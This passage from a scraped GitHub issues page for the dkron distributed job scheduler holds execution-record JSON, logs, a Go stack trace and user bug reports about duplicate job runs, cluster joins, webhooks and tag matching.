    "success": true,
    "output": "IDEwOjA0OjIwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDMsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": ​1450688660000278399,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.07970281+01:00",
    "finished_at": "2015-12-21T10:04:20.084218902+01:00",
    "success": true,
    "output": "IDEwOjA0OjIwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": ​1450688660000278399,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:20.080449838+01:00",
    "finished_at": "2015-12-21T10:04:20.083152242+01:00",
    "success": true,
    "output": "IDEwOjA0OjIwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTQsIDAuMTksIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": ​1450688660000278399,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.001022246+01:00",
    "finished_at": "2015-12-21T10:04:30.006653609+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDQ3MSBkYXlzLCAyMzo1OSwgIDUgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDEuMDMsIDAuOTIsIDAuNzcK",
    "node_name": "cz-dc-v-213.mall.local",
    "group": ​1450688670000398125,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.079775433+01:00",
    "finished_at": "2015-12-21T10:04:30.082153846+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDEzNyBkYXlzLCAyMDo0MywgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMDAsIDAuMDEsIDAuMDAK",
    "node_name": "cz-dc-v-214.mall.local",
    "group": ​1450688670000398125,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

        {
            "role": "nrh_dkron_server"
        }
    }

},
{

    "job_name": "uptime20151221",
    "started_at": "2015-12-21T10:04:30.080502914+01:00",
    "finished_at": "2015-12-21T10:04:30.08370006+01:00",
    "success": true,
    "output": "IDEwOjA0OjMwIHVwIDM4MiBkYXlzLCAxOTowOCwgIDAgdXNlcnMsICBsb2FkIGF2ZXJhZ2U6IDAuMTIsIDAuMTgsIDAuMTEK",
    "node_name": "cz-dc-v-211.mall.local",
    "group": ​1450688670000398125,
    "job": 

{

    "name": "uptime20151221",
    "schedule": "*/10 * * * * *",
    "command": "uptime",
    "owner": "",
    "owner_email": "",
    "run_as_user": "",
    "success_count": ​0,
    "error_count": ​0,
    "last_success": "0001-01-01T00:00:00Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": 

            {
                "role": "nrh_dkron_server"
            }
        }
    }

]

Same job executed in parallel on all nondes

I faced a problem with job execution and would like to clarify if it's a bug or a feature.

Set up:

After checkout master and glide install:

$ docker-compose up
Creating dkron_etcd_1
Creating dkron_dkron_seed_1
Creating dkron_dkron_1
Attaching to dkron_etcd_1, dkron_dkron_seed_1, dkron_dkron_1
etcd_1       | [etcd] Mar  4 09:45:41.441 WARNING   | Using the directory dcron1.etcd as the etcd curation directory because a directory was not specified.
etcd_1       | [etcd] Mar  4 09:45:41.443 INFO      | dcron1 is starting a new cluster
etcd_1       | [etcd] Mar  4 09:45:41.447 INFO      | etcd server [name dcron1, listen on :4001, advertised url http://127.0.0.1:4001]
etcd_1       | [etcd] Mar  4 09:45:41.447 INFO      | peer server [name dcron1, listen on :7001, advertised url http://127.0.0.1:7001]
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1 starting in peer mode
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: state changed from 'initialized' to 'follower'.
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: state changed from 'follower' to 'leader'.
etcd_1       | [etcd] Mar  4 09:45:41.448 INFO      | dcron1: leader changed from '' to 'dcron1'.
dkron_seed_1 | Starting Dkron agent...
dkron_seed_1 | time="2016-03-04T09:46:17Z" level=info msg="agent: Dkron agent starting"
dkron_seed_1 | time="2016-03-04T09:46:17Z" level=info msg="agent: joining: [dkron:8946] replay: true"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=warning msg="agent: error joining: lookup dkron on 8.8.8.8:53: no such host"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="api: Running HTTP server" address=":8080"
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="agent: Successfully set leader" key=492e1f77c19a463f90433df6044fdadf675f750e
dkron_seed_1 | time="2016-03-04T09:46:18Z" level=info msg="agent: Listen for events"
dkron_1      | Starting Dkron agent...
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: Dkron agent starting"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: joining: [dkron_seed:8946] replay: true"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: joined: 1 nodes"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="api: Running HTTP server" address=":8080"
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: The current leader is active" key=492e1f77c19a463f90433df6044fdadf675f750e
dkron_1      | time="2016-03-04T09:46:18Z" level=info msg="agent: Listen for events"

Action:

Then I've published a new job, to run date every 10 seconds:

$ curl -n -XPOST 192.168.99.100:32780/v1/jobs  -H "Content-Type: application/json"    -d '{
  "name": "cron_job",
  "schedule": "*/10 * * * * *",
  "command": "/bin/date"
}'
{"name":"cron_job","schedule":"*/10 * * * * *","command":"/bin/date","owner":"","owner_email":"","run_as_user":"","success_count":0,"error_count":0,"last_success":"0001-01-01T00:00:00Z","last_error":"0001-01-01T00:00:00Z","disabled":false,"tags":null}

Result:

And both nodes have started to trigger job simultaneously:

dkron_seed_1 | time="2016-03-04T09:48:10Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:10Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:20Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:20Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:30Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:30Z" level=info msg="agent: Starting job" job="cron_job"
dkron_seed_1 | time="2016-03-04T09:48:40Z" level=info msg="agent: Starting job" job="cron_job"
dkron_1      | time="2016-03-04T09:48:40Z" level=info msg="agent: Starting job" job="cron_job"

And success counter increased by 2.

Expectation:

Since dkron_seed_1 is a leader, means only this node should trigger job.

I'd assume it's a bug. Cause sending email or trigger recurrent payments by cron must be unique.

Correct me if I'm wrong.
Thank you.

/cc @Victorcoder

Cron runs on both servers in a cluster

Related to #55 and #62. I have two instances that are in a cluster together. /v1/leader lists one of the two, but both run the script.

$ curl 127.0.0.1:8988/v1/leader
{"Name":"ip-10-100-15-123","Addr":"10.100.15.123","Port":8946,"Tags":{"key":"6dba49e7c1cd0e361fd609f05f10b3af789cb6b5","role":"background_processing","server":"true"},"Status":1,"ProtocolMin":1,"ProtocolMax":2,"ProtocolCur":2,"DelegateMin":2,"DelegateMax":4,"DelegateCur":4}

From CRON_JOB in Consul:

{
  "job_name": "cron_job",
  "started_at": "2016-02-18T03:54:00.000793897Z",
  "finished_at": "2016-02-18T03:54:00.003708152Z",
  "success": true,
  "node_name": "ip-10-100-15-123",
  "group": 1455767640000272515,
  "job": {
    "name": "cron_job",
    "schedule": "0 * * * * *",
    "command": "/cron-worker-queue.sh",
    "owner": "Me",
    "owner_email": "[email protected]",
    "run_as_user": "ubuntu",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-18T03:50:27.827976052Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
      "role": "background_processing"
    }
  }
}
{
  "job_name": "cron_job",
  "started_at": "2016-02-18T03:54:00.185756608Z",
  "finished_at": "2016-02-18T03:54:00.190238507Z",
  "success": true,
  "node_name": "ip-10-100-15-187",
  "group": 1455767640000272515,
  "job": {
    "name": "cron_job",
    "schedule": "0 * * * * *",
    "command": "/cron-worker-queue.sh",
    "owner": "Me",
    "owner_email": "[email protected]",
    "run_as_user": "ubuntu",
    "success_count": 58,
    "error_count": 0,
    "last_success": "2016-02-18T03:50:27.827976052Z",
    "last_error": "0001-01-01T00:00:00Z",
    "disabled": false,
    "tags": {
      "role": "background_processing"
    }
  }
}

Any ideas? Pinging @whizz on this, since it seems like they've dealt with this. Thanks!

Jobs run :05 or :10 after schedule

I'm still in the early stages of investigating this, but I thought I'd open a ticket in case you had some insight.

We're noticing that for most of the time, the jobs run exactly at :00. But once in awhile - particularly if the instance is running at least one other thread - it will run at :05 or :10 after. It's never in between; rather, it's always increments of 5 seconds.

Any idea why this might be, and if there's anything that can be done to alleviate?

(For what it's worth, this is 0.6.3.)

please include linux_arm to builds

Thanks for dkron!

Please add linux_arm to the list of devices you publish releases for. That would be fantastic for me, and Raspberry PI users.

GOOS=linux GOARCH=arm

Dasboard crash

After a while of running, with no immediately apparent reason, the dashboard starts crashing on any request with following log:

2016-02-25_08:08:29.59255 2016/02/25 09:08:29 http: panic serving 10.9.233.79:64571: runtime error: invalid memory address or nil pointer dereference
2016-02-25_08:08:29.59256 goroutine 24472 [running]:
2016-02-25_08:08:29.59256 net/http.(*conn).serve.func1(0xc820222160, 0x7faffff49240, 0xc820118010)
2016-02-25_08:08:29.59257       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1287 +0xb5
2016-02-25_08:08:29.59257 github.com/victorcoder/dkron/dkron.newCommonDashboardData(0xc82010e820, 0xc820162280, 0x16, 0x0, 0x0, 0x0)
2016-02-25_08:08:29.59257       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:33 +0x55f
2016-02-25_08:08:29.59258 github.com/victorcoder/dkron/dkron.(*AgentCommand).dashboardIndexHandler(0xc82010e820, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59258       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:73 +0x4a7
2016-02-25_08:08:29.59258 github.com/victorcoder/dkron/dkron.(*AgentCommand).(github.com/victorcoder/dkron/dkron.dashboardIndexHandler)-fm(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59258       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/dashboard.go:43 +0x3e
2016-02-25_08:08:29.59259 net/http.HandlerFunc.ServeHTTP(0xc820229bb0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59259       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59261 github.com/victorcoder/dkron/vendor/github.com/gorilla/mux.(*Router).ServeHTTP(0xc82010eaf0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59261       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/gorilla/mux/mux.go:98 +0x29e
2016-02-25_08:08:29.59261 github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).UseHandler.func1.1(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59262       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:55 +0x69
2016-02-25_08:08:29.59262 net/http.HandlerFunc.ServeHTTP(0xc820174f90, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59262       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59262 github.com/victorcoder/dkron/dkron.metaMiddleware.func1.1(0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59263       /Users/victorcoder/src/github.com/victorcoder/dkron/dkron/api.go:75 +0x1ac
2016-02-25_08:08:29.59263 net/http.HandlerFunc.ServeHTTP(0xc820175080, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59264       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1422 +0x3a
2016-02-25_08:08:29.59264 github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose.(*Middleware).ServeHTTP(0xc8202365e0, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59264       /Users/victorcoder/src/github.com/victorcoder/dkron/vendor/github.com/carbocation/interpose/interpose.go:85 +0x6c
2016-02-25_08:08:29.59264 net/http.serverHandler.ServeHTTP(0xc820137c20, 0x7faffff495b0, 0xc8201c4160, 0xc8200da2a0)
2016-02-25_08:08:29.59265       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1862 +0x19e
2016-02-25_08:08:29.59265 net/http.(*conn).serve(0xc820222160)
2016-02-25_08:08:29.59265       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1361 +0xbee
2016-02-25_08:08:29.59265 created by net/http.(*Server).Serve
2016-02-25_08:08:29.59267       /Users/victorcoder/src/github.com/mxcl/homebrew/Cellar/go/1.5/libexec/src/net/http/server.go:1910 +0x3f6

server value from config json is not used

If you specify a "server" option (set to true) in the configuration json, it is ignored. Only command line option works. Not sure if it is a bug or a feature, but the docs state, that all command line options can be set in the config file.

Notifications

First step is to have email notifications.

Second step webhook configuration to send notifications to.

Commandline option -join does not work when used multiple times

When you specify multiple -join values, the agent will not join a cluster, as the value is wrongly interpreted.

# ./dkron agent -node v-5004.local -bind 0.0.0.0:8946 -http-addr :8080 -backend consul -backend-machine v-211.local:8500 -server -keyspace dkron -encrypt kPpdjphiipNSsjd4QHWbkA== -rpc-port 6868 -tag role=test -join 127.0.0.1:5001 -join 127.0.0.1:5002

INFO[0000] No valid config found: Unsupported Config Type ""
 Applying default values.
Starting Dkron agent...
INFO[2015-12-14T13:37:48+01:00] agent: Dkron agent starting
INFO[2015-12-14T13:37:48+01:00] agent: joining: [127.0.0.1:5001,127.0.0.1:5002] replay: true
WARN[2015-12-14T13:37:48+01:00] agent: error joining: too many colons in address 127.0.0.1:5001,127.0.0.1:5002
INFO[2015-12-14T13:37:48+01:00] api: Running HTTP server                      address=:8080
INFO[2015-12-14T13:37:48+01:00] api: Exiting HTTP server
INFO[2015-12-14T13:37:48+01:00] agent: Listen for events

Plugable job types

This is an open discussion on how to implement different job types.

Some use cases won't need or don't benefit from shell execution and specially with lots of jobs.

Node failing to join without reason

Hey, I am just getting everything setup. So I have things working very well on a single host via docker containers. However, when I attempt to expand that out to other hosts, the agent fails to join and gives no reason. My main docker-compose looks like:

dkron-server-luigi:
  container_name: dkron-server-luigi
  hostname: dkron-server-luigi
  links:
    - dkron-agent-luigi
  ports:
    - "8946:8946/udp"
    - "8946:8946"
    - "6868:6868/udp"
    - "6868:6868"
    - "8080:8080"
  build: ./
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./config:/opt/local/dkron/config
  command: agent -server -backend=etcd -backend-machine=10.100.4.249:4001 -join=10.100.4.155:8946 -debug=true
dkron-agent-luigi:
  container_name: dkron-agent-luigi
  hostname: dkron-agent-luigi
  ports:
    - "8946"
    - "6868"
  build: ./
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./config:/opt/local/dkron/config
  command: agent -debug=true -join=10.100.4.249:8946
etcd:
  image: microbox/etcd
  ports:
    - "4001:4001"
  volumes:
    - ./etcd.data:/data
  command: -name=dcron1

The above setup works great, but my remote agent docker-compose looks like:

dkron-agent-qcb1:
  container_name: dkron-agent-qcb1
  hostname: dkron-agent-qcb1
  ports:
    - "8946:8946"
    - "8946:8946/udp"
    - "6868:6868"
    - "6868:6868/udp"
  build: ./dkron
  volumes:
    - /var/run/docker.sock:/var/run/docker.sock
    - ./dkron/config:/opt/local/dkron/config
  command: agent -debug=true -join=10.100.4.249:8946

both are being build from the docker registry dkron/dkron:latest, and the error message is simply:

dkron-agent-qcb1 | time="2016-04-18T21:14:11Z" level=debug msg="agent: Received event" event=member-join 
dkron-agent-qcb1 | time="2016-04-18T21:14:18Z" level=debug msg="agent: Received event" event=member-failed 

my dkron.json looks like:

{
  "tags": {
    "role": "qcb_docker"
  },
  "keyspace": "dcron"
}

which is basically the same on both hosts.

I have played with all the network settings and cannot seem to find anything wrong, all of my ports are open all all protocols for both hosts. When I query the members, the remote host shows up but with a status of 4. Here is the response from that:

[{'Addr': '172.17.0.4',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-server-luigi',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 1,
  'Tags': {'key': '8f18334d9e26440bff0f3df9ad7fab6994074f8c',
   'role': 'luigi_docker',
   'server': 'true'}},
 {'Addr': '172.17.0.13',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-agent-qcb1',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 4,
  'Tags': {'role': 'qcb_docker'}},
 {'Addr': '172.17.0.2',
  'DelegateCur': 4,
  'DelegateMax': 4,
  'DelegateMin': 2,
  'Name': 'dkron-agent-luigi',
  'Port': 8946,
  'ProtocolCur': 2,
  'ProtocolMax': 2,
  'ProtocolMin': 1,
  'Status': 1,
  'Tags': {'role': 'luigi_docker'}}]

Does anything catch your eye here?

Security layer

Implement the security layer using the serf key management

Couple questions

Hey, I'm sorry about directing these here, but not sure where else to go. My team and I are looking at implementing this, we have a couple questions though:

Can you execute commands on remote servers?

When do you all think this will be stable? Are you still seeing bugs in basic executions?

Thanks

List of nodes in dashboard keeps reordering

It's a cosmetic issue. The dashboard homepage (/dashboard) displays a list of nodes at the bottom. It gets live updated. It is probably not sorted though, so it keeps randomly changing the order of the nodes. It's more annoying than anything, so not a huge priority I guess.

Translate node status

Currently the node status in UI node list is shown as a number.

Will be useful for the user to show the status in plain english.

Run job on one node at a time only?

Hello,

I have a special use case that I'm not sure how to get around it:

Every day our store has thousands of invoice to check and and send out, we usually schedule this to run at a specific time of the day. I would love to use dkron to have the advantage of ensuring that the crob job does not rely on a single machine to run, but I also have to ensure that this only runs on 1 single machine (Since we should not send invoices twice). I would love to have the ability to pick the best fit machine at run time (least resource usage for example) then run the cron there but not on any other machine.

Job overwrite

Don't overwrite job stats that doesn't change on job updating

Webhook alert firing on success

Hey, I just got the web hooks going, and they are working, except they are also firing when a job succeeds.

dkron-server-central | time="2016-04-29T22:22:12Z" level=info msg="agent: Running for election" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:22:12Z" level=info msg="agent: Cluster leadership lost" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:22:12Z" level=debug msg="agent: Stopping scheduler due to lost leadership" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:03Z" level=debug msg="agent: Received event" event="query: rpc:config" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:03Z" level=debug msg="agent: RPC Config requested" at=633 node=aws-nv-p-ops-elk payload= query="rpc:config" 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="rpc: Received execution done" group=1461969000000382365 job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Retrieved job from datastore" job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Setting key" execution=1461969000000899257-aws-nv-p-ops-luigi.valkyrie.net job=sched node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="store: Setting job" job=sched json="{\"name\":\"sched\",\"schedule\":\"0 */5 * * *\",\"command\":\"/home/patrick.barker/.pyenv/versions/anaconda3-2.4.1/bin/python /home/patrick.barker/dkron-python/scriptname/sched.py\",\"owner\":\"\",\"owner_email\":\"[email protected]\",\"run_as_user\":\"\",\"success_count\":1,\"error_count\":0,\"last_success\":\"2016-04-29T22:30:03.423389784Z\",\"last_error\":\"0001-01-01T00:00:00Z\",\"disabled\":false,\"tags\":{\"role\":\"luigi_docker\"}}" node=aws-nv-p-ops-elk 
dkron-server-central | time="2016-04-29T22:30:06Z" level=debug msg="Webhook call response" body= header=map[X-Ratelimit-Limit:[100] Connection:[keep-alive] X-Ratelimit-Remaining:[100] Location:[https://hipchat.datalogix.com/v2/room/262/history/a0b2f4f5-1b51-40d4-b38b-10cf1e89988a] Access-Control-Allow-Origin:[*] X-Ratelimit-Reset:[1461969307] Server:[nginx] Date:[Fri, 29 Apr 2016 22:30:06 GMT] Content-Type:[text/html] X-Robots-Tag:[noindex, nofollow, nosnippet, noarchive] Strict-Transport-Security:[max-age=31536000]] node=aws-nv-p-ops-elk status="204 No Content" 

The UI shows that the job was a success. Any ideas what could be happening here? Thanks

scheduling mismatch tags with same prefix

I have two servers, one has role of vpnserver and another vpnserver2, after posting a job targeting tags vpnserver, both servers got scheduled.

curl 127.0.0.1:8080/v1/members | python -m json.tool
[
{
"Addr": "10.0.0.9",
"DelegateCur": 4,
"DelegateMax": 4,
"DelegateMin": 2,
"Name": "h1",
"Port": 8946,
"ProtocolCur": 2,
"ProtocolMax": 2,
"ProtocolMin": 1,
"Status": 1,
"Tags": {
"key": "xxx1",
"role": "vpnserver2",
"server": "true"
}
},
{
"Addr": "10.0.0.1",
"DelegateCur": 4,
"DelegateMax": 4,
"DelegateMin": 2,
"Name": "h2",
"Port": 8946,
"ProtocolCur": 2,
"ProtocolMax": 2,
"ProtocolMin": 1,
"Status": 1,
"Tags": {
"key": "xxx2",
"role": "vpnserver",
"server": "true"
}
}
]

curl -n -X POST 127.0.0.1:8080/v1/jobs
-H "Content-Type: application/json"

-d '{
"name": "uptime",
"schedule": "0 30 * * * *",
"command": "uptime",
"tags": {
"role": "vpnserver"
}
}'

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.